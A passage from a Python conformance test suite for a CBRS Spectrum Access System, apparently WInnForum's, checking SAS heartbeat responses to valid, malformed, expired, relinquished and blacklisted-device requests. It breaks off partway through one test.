def test_WINNF_FT_S_HBT_5(self):
"""SAS has requested CBSD to perform measurement through measReportConfig
in the initial Grant response, or through a subsequent Heartbeat Response.
The response should be SUCCESS.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
device_a['measCapability'] = ['EUTRA_CARRIER_RSSI_ALWAYS']
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
grant_expire_time = datetime.strptime(response['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
del request, response
# Trigger to request measurement report for all subsequent heartbeat request
self._sas_admin.TriggerMeasurementReportHeartbeat({'measReportConfig':
['EUTRA_CARRIER_RSSI_ALWAYS']})
# First Heartbeat Request to Authorize Device
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertTrue('EUTRA_CARRIER_RSSI_ALWAYS' in response['measReportConfig'])
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
transmit_expire_time = datetime.strptime(
response['transmitExpireTime'], '%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time, grant_expire_time)
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# Get measReport
meas_report = json.load(
open(os.path.join('testcases', 'testdata', 'meas_report_0.json')))
# Second Heartbeat Request with measReport
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED',
'measReport': meas_report
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
transmit_expire_time = datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(transmit_expire_time, grant_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertEqual(response['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_6(self):
"""Array request: SAS-directed Heartbeat Req: SAS has requested CBSD to
perform measurement through measReportConfig in Grant response or a
previous Heartbeat Response.
The response should be SUCCESS.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
devices = [device_a, device_c]
for device in devices:
self._sas_admin.InjectFccId({'fccId': device['fccId']})
device_a['measCapability'] = ['EUTRA_CARRIER_RSSI_ALWAYS']
request = {'registrationRequest': devices}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
cbsd_ids = []
self.assertEqual(len(response), len(devices))
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_ids[0]
grant_1 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_1['cbsdId'] = cbsd_ids[1]
request = {'grantRequest': [grant_0, grant_1]}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
self.assertEqual(len(response), len(cbsd_ids))
grant_expire_times = []
grant_ids = []
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertTrue(resp['grantId'])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Trigger to request measurement report for all subsequent heartbeat request
self._sas_admin.TriggerMeasurementReportHeartbeat({'measReportConfig':
['EUTRA_CARRIER_RSSI_ALWAYS']})
# First Heartbeat Request to Authorize the Device
heartbeat_request = [{
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[1],
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}]
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertEqual(resp['grantId'], grant_ids[resp_number])
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time, grant_expire_times[resp_number])
self.assertEqual(resp['response']['responseCode'], 0)
self.assertTrue('EUTRA_CARRIER_RSSI_ALWAYS' in response[0]['measReportConfig'])
del request, response
# Get measReport
meas_report = json.load(
open(os.path.join('testcases', 'testdata', 'meas_report_0.json')))
# Heartbeat Request
heartbeat_request = [{
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED',
'measReport': meas_report
}, {
'cbsdId': cbsd_ids[1],
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}]
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertEqual(resp['grantId'], grant_ids[resp_number])
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time, grant_expire_times[resp_number])
self.assertEqual(resp['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_9(self):
"""Initial Heartbeat Request (immediately after CBSD moves
into Granted State) is from a CBSD with an unsupported protocol
version by SAS.
The response should be FAIL, code 100.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# Save SAS version
version = self._sas._sas_version
# Use higher than supported version
self._sas._sas_version = 'v2.0'
# First Heartbeat with unsupported SAS-CBSD protocol version
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
try:
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['response']['responseCode'], 100)
except AssertionError as e:
# Allow HTTP status 404
self.assertEqual(e.args[0], 404)
finally:
# Put SAS version back
self._sas._sas_version = version
@winnforum_testcase
def test_10_9_4_2_3_1_1(self):
"""CBSD heartbeat request with missing cbsdId parameter.
Heartbeat request immediately after CBSD moves into Granted State. The
cbsdId is missing in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(),
datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# cbsdId is missing
request = {
'heartbeatRequest': [{
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['response']['responseCode'], 102)
@winnforum_testcase
def test_WINNF_FT_S_HBT_10(self):
"""Initial Heartbeat Request (immediately after CBSD moves
into Granted State) is from three CBSDs with an unsupported
protocol version by SAS.
The response should be FAIL, code 100.
"""
# Register the devices
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_e.json')))
self._sas_admin.InjectFccId({'fccId': device_b['fccId']})
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
self._sas_admin.InjectFccId({'fccId': device_c['fccId']})
request = {'registrationRequest': [device_a, device_b, device_c]}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids = [resp['cbsdId'] for resp in response]
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_ids[0]
grant_1 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_1['cbsdId'] = cbsd_ids[1]
grant_2 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_2['cbsdId'] = cbsd_ids[2]
request = {'grantRequest': [grant_0, grant_1, grant_2]}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
self.assertEqual(len(response), len(cbsd_ids))
for resp_number, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[resp_number])
self.assertTrue(resp['grantId'])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids = (response[0]['grantId'], response[1]['grantId'], response[2]['grantId'])
del request, response
# Save sas version
version = self._sas._sas_version
# Use higher than supported version
self._sas._sas_version = 'v2.0'
# First Heartbeat with unsupported SAS-CBSD protocol version
heartbeat_0 = {
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED'
}
heartbeat_1 = {
'cbsdId': cbsd_ids[1],
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}
heartbeat_2 = {
'cbsdId': cbsd_ids[2],
'grantId': grant_ids[2],
'operationState': 'GRANTED'
}
request = {'heartbeatRequest': [heartbeat_0, heartbeat_1, heartbeat_2]}
try:
response = self._sas.Heartbeat(request)['heartbeatResponse']
self.assertEqual(len(response), len(grant_ids))
for resp in response:
# Check the heartbeat response
self.assertEqual(resp['response']['responseCode'], 100)
except AssertionError as e:
# Allow HTTP status 404
self.assertEqual(e.args[0], 404)
finally:
# Put sas version back
self._sas._sas_version = version
@winnforum_testcase
def test_10_9_4_2_3_1_2(self):
"""CBSD heartbeat request with missing grantId parameter.
Heartbeat request immediately after CBSD moves into Granted State. The
grantId is missing in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(),
datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# grantId is missing
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['response']['responseCode'], 102)
@winnforum_testcase
def test_10_9_4_2_3_1_3(self):
"""CBSD heartbeat request with missing operationState parameter.
Heartbeat request immediately after CBSD moves into Granted State. The
operationState is missing in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(),
datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# operationState is missing
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['response']['responseCode'], 102)
@winnforum_testcase
def test_WINNF_FT_S_HBT_14(self):
"""CBSD heartbeat requests with various missing parameter.
Heartbeat request immediately after CBSD moves into Granted State.
Three requests out of the four have some needed parameter missing.
The response should be FAIL.
"""
# Register the devices
registration_request = []
for device_filename in ('device_a.json', 'device_b.json', 'device_c.json',
'device_d.json'):
device = json.load(
open(os.path.join('testcases', 'testdata', device_filename)))
self._sas_admin.InjectFccId({'fccId': device['fccId']})
registration_request.append(device)
request = {'registrationRequest': registration_request}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
cbsd_ids = []
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Request grant
grant_request = []
for cbsd_id in cbsd_ids:
grant = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant['cbsdId'] = cbsd_id
grant_request.append(grant)
request = {'grantRequest': grant_request}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
grant_ids = []
grant_expire_times = []
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Prepare Heartbeats (these are first heartbeats)
# 1. valid, 2. no cbsd_id, 3. no grantId, 4. no operationState
heartbeat_request = [{
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED'
}, {
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[2],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[3],
'grantId': grant_ids[3],
}]
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
self.assertEqual(len(response), 4)
# check the cbsdId and grantId where the request message had accurate values
for response_num in (0, 3):
self.assertEqual(response[response_num]['cbsdId'], cbsd_ids[response_num])
self.assertEqual(response[response_num]['grantId'],
grant_ids[response_num])
self.assertEqual(response[0]['response']['responseCode'], 0)
transmit_expire_time = datetime.strptime(response[0]['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLess(transmit_expire_time, grant_expire_times[0])
self.assertTrue(response[1]['response']['responseCode'] in (102, 105))
for response_num in (2, 3):
self.assertEqual(response[response_num]['response']['responseCode'], 102)
@winnforum_testcase
def test_WINNF_FT_S_HBT_15(self):
"""CBSD heartbeat request with invalid grantId parameter.
Heartbeat request immediately after CBSD moves into Granted State. The
grantId is invalid in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
transmit_expire_time_1 = datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# Send second heartbeat request with an invalid grantId
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id + '-changed',
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['response']['responseCode'] in (103, 105))
self.assertLessEqual(
datetime.strptime(response['transmitExpireTime'], '%Y-%m-%dT%H:%M:%SZ'),
transmit_expire_time_1)
@winnforum_testcase
def test_WINNF_FT_S_HBT_16(self):
"""CBSD heartbeat request after grant is terminated.
Heartbeat request immediately after CBSD moves out of Granted State. The
grantId is invalid in heartbeat request. The response should be FAIL.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
grant_expire_time = datetime.strptime(response['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertEqual(response['response']['responseCode'], 0)
# Enter the Authorized state
request['heartbeatRequest'][0]['operationState'] = 'AUTHORIZED'
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Verify successful response
transmit_expire_time = datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertEqual(response['response']['responseCode'], 0)
del request, response
# Relinquish the grant
# Note: The Testcase requires grant to be terminated at this point, but
# here the grant is being relinquished. The test case document will be
# updated later to use this method
request = {
'relinquishmentRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id
}]
}
response = self._sas.Relinquishment(request)['relinquishmentResponse'][0]
# Check the relinquishment response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertEqual(response['response']['responseCode'], 0)
# use relinquished grantId in new heartbeat request after transmitExpireTime
# is passed, but before the grant expiry
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
transmit_expiry_wait_time = (
transmit_expire_time - datetime.utcnow()).total_seconds()
time.sleep(transmit_expiry_wait_time + 1)
self.assertGreater(datetime.utcnow(), transmit_expire_time)
self.assertLess(datetime.utcnow(), grant_expire_time)
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['response']['responseCode'] in (103, 500))
self.assertLessEqual(
datetime.strptime(response['transmitExpireTime'], '%Y-%m-%dT%H:%M:%SZ'),
transmit_expire_time)
@winnforum_testcase
def test_WINNF_FT_S_HBT_17(self):
"""Heartbeat Request from CBSD in Registered state (immediately after CBSD's grant is expired)
Response Code should be 103 or 500"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
grant_expire_time = datetime.strptime(response['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ')
del request, response
# Calculate the Difference Between Current Time and the GrantExpireTime
difference_time = (grant_expire_time - datetime.utcnow()).total_seconds()
logging.debug('Difference between grantExpireTime and CurrentTime (in seconds) ', difference_time)
self.assertGreaterEqual(grant_expire_time, datetime.utcnow())
time.sleep(difference_time + 1)
# Request Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
# Response Should fail with Code 103 or 500
self.assertTrue(response['response']['responseCode'] in (103, 500))
@winnforum_testcase
def test_WINNF_FT_S_HBT_18(self):
"""CBSD heartbeat requests with invalid parameter(s).
Heartbeat request immediately after CBSD moves into Granted State.
The requests have some parameter with invalid value
The response should be FAIL.
"""
# Register the devices
registration_request = []
for device_filename in ('device_a.json', 'device_b.json', 'device_c.json'):
device = json.load(
open(os.path.join('testcases', 'testdata', device_filename)))
self._sas_admin.InjectFccId({'fccId': device['fccId']})
registration_request.append(device)
request = {'registrationRequest': registration_request}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
cbsd_ids = []
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Request grant
grant_request = []
for cbsd_id in cbsd_ids:
grant = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant['cbsdId'] = cbsd_id
grant_request.append(grant)
request = {'grantRequest': grant_request}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
grant_ids = []
grant_expire_times = []
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Prepare Heartbeats
# No. 1,2 - valid requests, No. 3 - invalid grantId in request
heartbeat_request = [{
'cbsdId': cbsd_ids[0],
'grantId': grant_ids[0],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[1],
'grantId': grant_ids[1],
'operationState': 'GRANTED'
}, {
'cbsdId': cbsd_ids[2],
'grantId': grant_ids[2] + '-changed',
'operationState': 'GRANTED'
}]
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check heartbeat response
self.assertEqual(len(response), 3)
for response_num in (0, 1):
self.assertEqual(response[response_num]['cbsdId'], cbsd_ids[response_num])
self.assertEqual(response[response_num]['grantId'],
grant_ids[response_num])
self.assertEqual(response[2]['cbsdId'], cbsd_ids[2])
self.assertFalse('grantId' in response[2])
for response_num in (0, 1):
self.assertEqual(response[response_num]['response']['responseCode'], 0)
transmit_expire_time = datetime.strptime(
response[response_num]['transmitExpireTime'], '%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time,
grant_expire_times[response_num])
self.assertEqual(response[2]['response']['responseCode'], 103)
# No need to check transmitExpireTime because this is the first heartbeat
@winnforum_testcase
def test_WINNF_FT_S_HBT_19(self):
"""Heartbeat Request from CBSD in Granted or Authorized state
(immediately after CBSD moves into Granted State or following
a Heartbeat Response) requires CBSD to de-register.
The response should be FAIL, code 105."""
# Register the device
device_a = json.load(open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# Inject Device into Blacklist
self._sas_admin.BlacklistByFccId({'fccId': device_a['fccId']})
# Request Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the first heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertTrue('transmitExpireTime' in response)
self.assertEqual(response['response']['responseCode'], 105)
@winnforum_testcase
def test_WINNF_FT_S_HBT_20(self):
"""Heartbeat Request from CBSDs in Granted or Authorized state
(immediately after CBSDs moves into Granted State or following
a Heartbeat Response) requires CBSDs to de-register.
The response should be FAIL, code 105.
"""
# Register the devices
registration_request = []
fcc_ids = []
for device_filename in ('device_a.json', 'device_c.json', 'device_e.json'):
device = json.load(
open(os.path.join('testcases', 'testdata', device_filename)))
fcc_ids.append(device['fccId'])
self._sas_admin.InjectFccId({'fccId': device['fccId']})
registration_request.append(device)
request = {'registrationRequest': registration_request}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids = [resp['cbsdId'] for resp in response]
del request, response
# Request grant
grant_request = []
for cbsd_id in cbsd_ids:
grant = json.load(open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant['cbsdId'] = cbsd_id
grant_request.append(grant)
request = {'grantRequest': grant_request}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
self.assertEqual(len(response), len(cbsd_ids))
grant_expire_time = []
for resp_number, resp in enumerate(response):
